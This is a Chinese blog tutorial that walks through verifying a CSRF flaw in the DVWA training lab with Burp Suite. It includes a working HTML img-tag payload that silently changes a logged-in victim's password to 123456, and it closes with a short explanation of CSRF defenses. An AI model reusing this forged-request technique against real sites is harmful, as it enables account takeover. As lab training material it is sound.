CSRF 漏洞验证

CSRF 漏洞验证

环境准备:

dvwa csrf 为例

burpsuite 工具

dvwa靶场(CSRF)

方法一:

1.修改密码抓包

这里是为了理解先抓包查看修改密码时的数据

GET /dvwa_2.0.1/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change HTTP/1.1

2.构造网页:

        这里我们修改密码为123456.

<meta charset='utf-8'>
<img src='../1.jpg'><br />
<img src='http://10.9.47.44/dvwa_2.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change'
alt='宝刀在手,谁与争锋'>

3.打开网页

这时密码已经被修改了

抓包查看和修改密码的内容一样

4.登录验证

看到我们是利用123456登录的

方法二:

1.修改密码时抓包。

2.自带生成代码

3.复制链接

4.访问使用

点击修改(用来验证是否存在CSRF漏洞)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种安全漏洞,攻击者通过伪造用户的请求,将不合法的请求发送到目标网站,从而达到攻击的目的。攻击者通常会在被攻击网站中嵌入恶意代码,当用户访问该网站时,恶意代码会自动发送伪造的请求,从而实现攻击。例如,攻击者可以伪造一个修改用户密码的请求,如果用户在登录状态下访问攻击者嵌入的网站,就会受到攻击。 验证方法: 1. 检查请求来源:在服务器端,可以通过检查请求的来源是否为合法的域名来防止CSRF攻击。通常情况下,合法的请求来源应该是当前网站的域名,而不是其他网站的域名。 2. 使用随机令牌:在表单中加入一个随机的令牌,用于验证表单是否来自合法的来源。服务器端在接收到表单提交时,需要验证该令牌是否合法。如果不合法,则拒绝该请求。 3. 验证HTTP Referer头:在服务器端,可以通过验证HTTP Referer头信息来判断请求来源是否合法。但是,这种方法并不可靠,因为攻击者可以通过修改HTTP Referer头来绕过验证。 4. 验证请求内容:在服务器端,可以对请求内容进行验证,确保请求内容不会对服务器造成损害。例如,如果请求是提交一个评论,可以对评论进行过滤,确保评论不包含恶意代码。 总之,为了防止CSRF攻击,需要在服务器端和客户端都进行相应的安全措施,以确保请求来源的合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值